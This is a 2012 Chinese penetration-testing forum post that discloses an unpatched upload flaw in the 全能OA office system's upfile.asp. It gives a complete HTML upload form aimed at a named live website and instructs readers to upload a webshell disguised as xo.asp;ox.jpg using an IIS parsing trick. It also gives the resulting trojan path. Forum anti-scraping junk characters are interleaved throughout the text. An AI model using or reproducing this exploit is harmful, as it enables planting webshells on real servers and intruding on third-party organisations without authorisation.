中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞; g7 G2 J0 W* ]9 n. q7 A3 ~0 n

/ @/ N# s4 ?' ?: t" T6 \系统介绍:' U: e; y7 i; Q$ X; s/ a  J/ Q
; G8 M" q( m' y* k3 p
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
* o" q3 y: e! ?2 Q& M, n2 g7 c2 `* i, T5 _, k  ]' j# p, [5 g  q
主要功能:
* p- W8 x2 i( j- ?( C公司通告
7 }3 w9 ], D, ~# E工作计划 8 S9 z! |% C1 m" e1 @
通讯助理 4 e, p& |: {8 }6 b- Q9 n
客户资源 ) X; ~4 [3 V" k3 Z9 J# w% d$ d
我的公文 ; b# ~/ f! K" S4 Q0 m6 |9 A
公文传阅 0 y  b( x$ R% T  A" d
公共资源 - i2 a+ @4 G0 k0 q
资源预约 ( B1 Q2 v. ]- q
今日考勤 ! x" D2 k1 |1 T, z) t+ z6 g
个人计划
, s/ J& U" D$ M. b个人通讯录 6 ~, d: ], H( t: }# l
个人基本档案
! o0 ^$ i9 h9 h4 W; ?; G未读邮件
/ ]* Y  \) M% x$ P5 r% T; f发邮件 3 A, I+ d$ C! r! H4 x) g
收件夹 9 b: b: S) E4 C. D/ o
寄件夹 ( s5 Q: u% E6 g. h# |
网络硬盘
4 R1 l* s5 s  f网络会议
' x. G- W0 M6 N2 T0 u网络调查
: [7 n) x/ `+ a/ G5 ?0 W交流论坛% I1 [* ]0 q* c
/ \' f: H9 y9 _! R* b
有兴趣测试的朋友可以下源码看看
/ S! d8 B% G! k5 A4 T% @- r* i4 l- O
源码下载:
2 P2 V/ t; G; B8 W
# i6 P4 V) j% q: u- Thttp://www.mycodes.net/30/4750.htm
; N5 h; B7 z) Y9 {; @
4 t4 k2 e1 z& A漏洞介绍:
$ P# c8 c# F2 S7 Z5 |, o4 `6 r" a" w9 C% _0 Y7 v5 l
由upfile.asp上传文件漏洞引起
5 O- A3 K2 J6 N  K; k1 H4 s& j6 j1 c3 T" Y5 A$ I7 _. z. \
测试方法:9 |* c  y( }% I$ F7 `2 P% j

; u8 o! _2 ]/ S; A4 y1 Z7 a使用名小子上传http://www.itlynn.com/upfile.asp即可/ H( }  s- Y) S4 j

! ~! G. Y* \3 F如果upfile.asp文件被删除不存在。
! G; M! x2 P( [8 G6 |& \* ?  E0 o0 c! l& |- I  b
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp- {* n5 \) Y% X3 {
; y% v) b! O: B: H/ q1 T
如果存在那么将如下代码保存为upfile.html。7 d$ o+ M  q8 D  G
' n, l+ \) f; h) @5 f$ v3 O/ R
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp$ t" u4 [' O: H! F7 p. z
, K  A/ }! E6 p, \
  B, M2 @% |& a( H# w+ s

; E8 |& x. I( y  u' P01 <table border='0' align="center" cellpadding="5"> # k- J0 D, K" |  Z6 ~6 x

$ c; j+ K+ Q) O02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> & W; _% ?+ j8 e' I6 D& [& l
2 l  w+ F7 u! M$ `
03 <tr> $ @  r' e  `- y8 L7 E3 w9 I

& i( S4 U( t# m& r04             <td>报错:</td> 1 q1 i# s" Q) q4 P0 p( z

4 C( {+ u- t6 g4 p( G05             <td><input type='radio' name='errnumber' value='0'> & P/ P( U+ \  B. e4 j8 P5 A, j+ U8 D/ M
& v& g" {; m0 l& W( S  A$ f
06               自动更名
1 {7 f& @  t) k2 j9 J
2 r: a8 D/ |, ]* b- j( {07               <input type='radio' name='errnumber' value='1' checked>
- N+ I0 Y& |6 n$ c& c, H' Z  W0 ]. `/ J
08               报错方式
' f9 c1 [. k* d4 x+ K2 F
! E! \! Y) E  C09               <input type='radio' name='errnumber' value='2'> $ K- H$ G" N3 S: w) s

/ W) p0 [) `7 ]7 o2 |10               直接覆盖</td> 7 V: a9 v; y- t) G/ K$ e" F

4 u. ~# ^0 Z& t2 ~' B* G" l  ?11           </tr>
2 N/ t% c% M4 z% r. {; a8 U$ t3 d$ K$ H7 U. n2 C- y+ q7 P
12           <tr>
1 h/ K% _+ M" N3 s- Q9 l9 q* K! n( E" i; f" `7 ^  ]
13             <td>主题:</td>
8 V: I* z! B$ E1 ~6 T$ {1 E9 D0 o2 r8 v- z9 I% `0 K+ l
14             <td><input type='text' name='filename' size='30'></td>
& V( l) G( p: a" ]- c; x! N* j( G8 |8 N0 u/ K, ?+ }
15           </tr>
- O8 J4 j# O  t4 r
1 |  B2 E0 `' i% p" {16           <tr> 2 c" P3 S+ }6 V/ F4 a
1 t" P9 d- c8 n( c" t# _5 \
17             <td>文件:</td>
1 s- L( @+ a5 u" F9 `" F+ k: }4 E/ @( T* |1 P
18             <td><input type="file"name="fruit"size="30"></td>
- O* j( v+ u- S$ [1 i$ v3 W& L8 _1 e( [: q. B' {
19           </tr> + l& N: s- j7 l1 t' l

/ O, e3 M5 C( P  F8 M  _0 @20           <tr> . l9 d- e) O( @" l  w' P8 [

8 [& r; c; U6 X) j+ P, d6 l21             <td valign='top'>简介:</td>
0 _+ Y8 c+ r& s& u* S1 j* e2 Z' ~
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 4 h0 I6 S, W/ u* t. k  q1 ^
( B! Y. c3 x' w. l! O
23           </tr> 1 n, L: ^) U) B

4 U/ f" M; I; ]( Z3 z8 s24   % S! ]. M5 z/ y  x& B, }- l
6 h4 F- a! C5 e' S& Y
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
6 i' Y4 e; V! n# a% `( G9 f2 h
& L1 g# K3 [) }6 E5 Q9 i# {26           </tr> + z8 d% ]* u/ g: t* [
" q2 K: ?" q* K% \/ g
27         </form>
& H3 ]4 }7 j% |
# S6 O9 @; S0 `然后打开上传一个文件名为xo.asp;ox.jpg的文件。" m# @! {! u2 }) S2 ~
4 B" y9 o% l7 z" {' s# c

0 o0 y0 g9 ]& g+ S/ L* @7 G: e% z) U
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
0 p, n, a' ^% {8 b2 a3 @/ `& w8 l& X1 a: O! i
此漏洞需要配合解析漏洞利用。- _" W' h6 l" h4 }$ F

9 T9 i% i- C" K3 k7 D




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2